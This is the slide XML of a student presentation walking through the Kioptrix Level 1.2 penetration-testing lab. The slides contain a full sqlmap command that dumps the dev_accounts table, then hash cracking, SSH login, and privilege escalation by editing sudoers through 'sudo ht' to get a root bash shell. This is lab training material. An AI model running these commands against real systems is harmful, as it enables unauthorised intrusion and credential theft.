              <a:path w="16713713" h="3029360" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16713713" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16713713" y="3029360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3029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68" name="Google Shape;268;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663528" y="3521215"/>
            <a:ext cx="16960944" cy="117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85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TO GET SOME  THE DATA FROM DEV_ACCOUNTS</a:t>
            </a:r>
            <a:endParaRPr sz="3185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85" u="none" strike="noStrike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sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1%27&amp;sort=photoid#photos" -p id -D gallery -T dev_accounts --dump </a:t>
            </a:r>
            <a:endParaRPr sz="3185" u="none" strike="noStrike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542" name="Google Shape;542;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2723387" y="3822027"/>
            <a:ext cx="12841223" cy="3980779"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12841223" h="3980779" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12841223" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12841223" y="3980779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3980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543" name="Google Shape;543;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3860390" y="247909"/>
            <a:ext cx="105672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u="none" strike="noStrik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Another way to crack hashes</a:t>
            </a:r>
            <a:endParaRPr sz="8000" u="none" strike="noStrik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48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5885167" y="2234296"/>
            <a:ext cx="58293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Crack the hashes with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200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crackstation</a:t>
            </a:r>
            <a:endParaRPr sz="3200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5" name="Google Shape;545;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5677923" y="8190209"/>
            <a:ext cx="5358884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now u have the username and password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74" name="Google Shape;274;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="4491990"/>
            <a:ext cx="16230600" cy="137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Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr sz="9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80" name="Google Shape;280;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140883" y="301067"/>
            <a:ext cx="18006234" cy="998593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7309296" y="3148236"/>
            <a:ext cx="9950004" cy="724584"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9950004" h="724584" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9950004" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9950004" y="724583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="724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22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82" name="Google Shape;282;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8817633" y="4140867"/>
            <a:ext cx="8406914" cy="651536"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8406914" h="651536" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8406914" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8406914" y="651536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="651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83" name="Google Shape;283;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8817633" y="5060450"/>
            <a:ext cx="7935192" cy="5163072"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7935192" h="5163072" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7935192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7935192" y="5163073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5163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84" name="Google Shape;284;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3000584" y="397837"/>
            <a:ext cx="12039600" cy="112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Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr sz="657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452768" y="2380323"/>
            <a:ext cx="8567616" cy="58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85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using the email and password that we get to connect throw ssh</a:t>
            </a:r>
            <a:endParaRPr sz="3185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6" name="Google Shape;286;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147855" y="4254635"/>
            <a:ext cx="7219355" cy="11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we got error search the error on google we fond this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1837922" y="6733040"/>
            <a:ext cx="5328404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we succsfully connect to dreg account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76" name="Google Shape;476;p42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530693" y="3567796"/>
            <a:ext cx="4759459" cy="1575704"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4759459" h="1575704" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4759459" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4759459" y="1575704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1575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8444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77" name="Google Shape;477;p42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11732974" y="2966214"/>
            <a:ext cx="4759459" cy="3194195"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4759459" h="3194195" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4759459" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4759459" y="3194196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3194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8807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78" name="Google Shape;478;p42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3493371" y="6613275"/>
            <a:ext cx="11301259" cy="3220859"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11301259" h="3220859" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11301258" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11301258" y="3220859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3220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79" name="Google Shape;479;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510913" y="400050"/>
            <a:ext cx="694825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u="none" strike="noStrik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Exploring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" u="none" strike="noStrike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intersts</a:t>
            </a:r>
            <a:endParaRPr sz="8000" u="none" strike="noStrik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0" name="Google Shape;480;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301720" y="1957280"/>
            <a:ext cx="4759459" cy="119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Verify user</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1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whoami</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1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12128328" y="1777504"/>
            <a:ext cx="3092172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There’re 3 directories.</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1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5515675" y="5491072"/>
            <a:ext cx="5723454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In loneferret there’re 2 interesting files.</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1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3" name="Google Shape;483;p42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9327607" y="9258300"/>
            <a:ext cx="2895600" cy="457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89" name="Google Shape;489;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5151117" y="2259249"/>
            <a:ext cx="12108184" cy="2316758"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11301259" h="2316758" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11301259" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11301259" y="2316758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2316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90" name="Google Shape;490;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5151115" y="6085879"/>
            <a:ext cx="12108183" cy="1794075"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11301259" h="1794075" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11301259" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11301259" y="1794075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="179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492" name="Google Shape;492;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1413942" y="2301674"/>
            <a:ext cx="2970252" cy="11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cat checksec.sh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there is no useful info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1096581" y="6339026"/>
            <a:ext cx="3604974" cy="11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Read next file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cat CompanyPolicy.README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7086600" y="8432083"/>
            <a:ext cx="4670465" cy="11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There’re “sudo ht” command to use.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93" name="Google Shape;293;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140883" y="531187"/>
            <a:ext cx="18006234" cy="998593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12211665" y="1814379"/>
            <a:ext cx="3538049" cy="1296384"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3538049" h="1296384" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3538049" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3538049" y="1296384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1296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95" name="Google Shape;295;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9319904" y="3493007"/>
            <a:ext cx="8643370" cy="3300986"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8643370" h="3300986" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8643370" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8643370" y="3300986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="330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96" name="Google Shape;296;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8788379" y="7625661"/>
            <a:ext cx="9174895" cy="1762567"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9174895" h="1762567" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9174895" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9174895" y="1762567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1762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9017" r="-52311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297" name="Google Shape;297;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3000584" y="397837"/>
            <a:ext cx="12039600" cy="141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5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exploring</a:t>
            </a:r>
            <a:endParaRPr sz="6575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8" name="Google Shape;298;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820417" y="963447"/>
            <a:ext cx="4872460" cy="441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try to get to home directory but we cant</a:t>
            </a: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 User ‘dreg’ is not in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2735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sudoers</a:t>
            </a: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 file.</a:t>
            </a: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try to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2735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swich</a:t>
            </a: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 to the other  account</a:t>
            </a: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sucess</a:t>
            </a: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 the account have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2735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privalge</a:t>
            </a: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nvigate</a:t>
            </a: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 to the files </a:t>
            </a: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we  cat check.sh and we didn’t found </a:t>
            </a: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any thing important</a:t>
            </a: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334063" y="5209520"/>
            <a:ext cx="5943600" cy="417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then we access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700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CompanyPolicy.README</a:t>
            </a:r>
            <a:endParaRPr sz="2700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and found this Hello new employee,</a:t>
            </a:r>
            <a:endParaRPr sz="2700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It is company policy here to use our newly installed software for editing, creating and viewing files.</a:t>
            </a:r>
            <a:endParaRPr sz="2700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Please use the command '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="27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ht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="27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'.</a:t>
            </a:r>
            <a:endParaRPr sz="2700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Failure to do so will result in you immediate termination.</a:t>
            </a:r>
            <a:endParaRPr sz="2700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25" name="Google Shape;125;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="3454550"/>
            <a:ext cx="10611580" cy="306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The Kioptrix: Level 1.2 virtual machine is designed for penetration testing practice. The goal is to exploit its vulnerabilities to gain root access. The process involves:</a:t>
            </a:r>
            <a:endParaRPr sz="25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Bebas Neue"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="25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Network Scanning: Use tools like Nmap to discover open ports and services.</a:t>
            </a:r>
            <a:endParaRPr sz="25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Bebas Neue"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="25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Service Enumeration: Analyze running services (e.g., HTTP, SSH) for potential weaknesses.</a:t>
            </a:r>
            <a:endParaRPr sz="25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Bebas Neue"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="25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Vulnerability Exploitation: Identify and exploit vulnerabilities in the discovered services to escalate privileges and gain root access.</a:t>
            </a:r>
            <a:endParaRPr sz="25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028700" y="7202833"/>
            <a:ext cx="10611580" cy="43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Gain root access by exploiting system vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr sz="25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13529441" y="5406672"/>
            <a:ext cx="5309822" cy="5648746"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5309822" h="5648746" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5309822" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5309822" y="5648746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5648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28" name="Google Shape;128;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="847725"/>
            <a:ext cx="10611580" cy="155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Introduction</a:t>
            </a:r>
            <a:endParaRPr sz="90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028700" y="6237633"/>
            <a:ext cx="1061158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Goal</a:t>
            </a:r>
            <a:endParaRPr sz="55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1028700" y="2488850"/>
            <a:ext cx="1061158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Objectives</a:t>
            </a:r>
            <a:endParaRPr sz="55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028700" y="7691295"/>
            <a:ext cx="10611580" cy="19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Tools</a:t>
            </a:r>
            <a:endParaRPr sz="55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028700" y="8659670"/>
            <a:ext cx="6954798" cy="43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nmap,burpsuit,Nikto,SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="0" i="0" u="none" strike="noStrike" cap="non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500" b="0" i="0" u="none" strike="noStrike" cap="none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MAP,crackstation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="0" i="0" u="none" strike="noStrike" cap="non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(site for crack hashes) </a:t>
            </a:r>
            <a:endParaRPr sz="25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05" name="Google Shape;305;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="140883" y="531187"/>
            <a:ext cx="18006234" cy="998593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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9810363" y="2026742"/>
            <a:ext cx="7094619" cy="1312505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7094619" h="1312505" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7094619" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7094619" y="1312505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1312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07" name="Google Shape;307;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11127588" y="3513642"/>
            <a:ext cx="4443772" cy="1095441"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4443772" h="1095441" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4443772" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4443772" y="1095441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1095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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="382714" y="4886913"/>
            <a:ext cx="10744874" cy="5224695"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10744874" h="5224695" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10744874" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10744874" y="5224695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5224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09" name="Google Shape;309;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3000584" y="397837"/>
            <a:ext cx="12039600" cy="141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5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Finding more</a:t>
            </a:r>
            <a:endParaRPr sz="6575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140882" y="962026"/>
            <a:ext cx="6658123" cy="568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Tried </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2735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sudo</a:t>
            </a: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735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ht</a:t>
            </a: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I could not use this command due to terminal was not fully functional.</a:t>
            </a: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googling the error</a:t>
            </a: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found that it is an editor. Because of that, I can run ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2735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sudo</a:t>
            </a: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735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ht</a:t>
            </a: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’ and edit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2735" dirty="0" err="1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sudoers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2735" dirty="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 file to escalate my privilege.</a:t>
            </a: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35" dirty="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16" name="Google Shape;316;p23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4924886" y="4000500"/>
            <a:ext cx="8190994" cy="5273217"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8190994" h="5273217" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8190993" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8190993" y="5273217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5273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17" name="Google Shape;317;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3000584" y="397837"/>
            <a:ext cx="12039600" cy="112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Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr sz="657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7238831" y="2382011"/>
            <a:ext cx="3563105" cy="204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5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(alt  f) then  push  oben button </a:t>
            </a:r>
            <a:endParaRPr sz="2735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35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35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499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35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116343" h="11093518" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="24116343" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24116343" y="11093518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11093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6137761" y="1669047"/>
            <a:ext cx="11301259" cy="1900171"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11121539" h="1900171" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11121539" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11121539" y="1900171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1900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819" b="-81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30" name="Google Shape;330;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6137761" y="4462462"/>
            <a:ext cx="11301259" cy="2147239"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11301259" h="2147239" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11301259" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11301259" y="2147240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2147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31" name="Google Shape;331;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6137761" y="7615285"/>
            <a:ext cx="11301259" cy="1737569"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11301259" h="1737569" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11301259" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11301259" y="1737569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1737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32" name="Google Shape;332;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033903" y="2123906"/>
            <a:ext cx="3810595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My first try was removing ‘!’</a:t>
            </a:r>
            <a:endParaRPr sz="32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3" name="Google Shape;333;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594384" y="4251959"/>
            <a:ext cx="4689634" cy="24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Press F2 to save and CTRL+c to exit</a:t>
            </a:r>
            <a:endParaRPr sz="32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sudo su -</a:t>
            </a:r>
            <a:endParaRPr sz="32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Still no </a:t>
            </a:r>
            <a:endParaRPr sz="32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848980" y="7615285"/>
            <a:ext cx="3709392" cy="11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Edit the file again by adding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/bin/bash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3124200" y="292582"/>
            <a:ext cx="12039600" cy="112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Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr sz="657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41" name="Google Shape;341;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5785925" y="2261584"/>
            <a:ext cx="10917553" cy="2186703"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10917553" h="2186703" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10917553" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10917553" y="2186702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2186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42" name="Google Shape;342;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5785924" y="6057900"/>
            <a:ext cx="10917553" cy="1651581"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9551641" h="1651581" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9551641" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9551641" y="1651581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1651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43" name="Google Shape;343;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="2342546"/>
            <a:ext cx="5334000" cy="427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Verify editing</a:t>
            </a:r>
            <a:endParaRPr sz="32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sudo –l</a:t>
            </a:r>
            <a:endParaRPr sz="32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C2E37"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:rPr>
              <a:t>sudo /bin/bash -p</a:t>
            </a:r>
            <a:endParaRPr sz="32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2C2E3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4" name="Google Shape;344;p26"/>
          <p:cNvSpPr txBox="1"/>
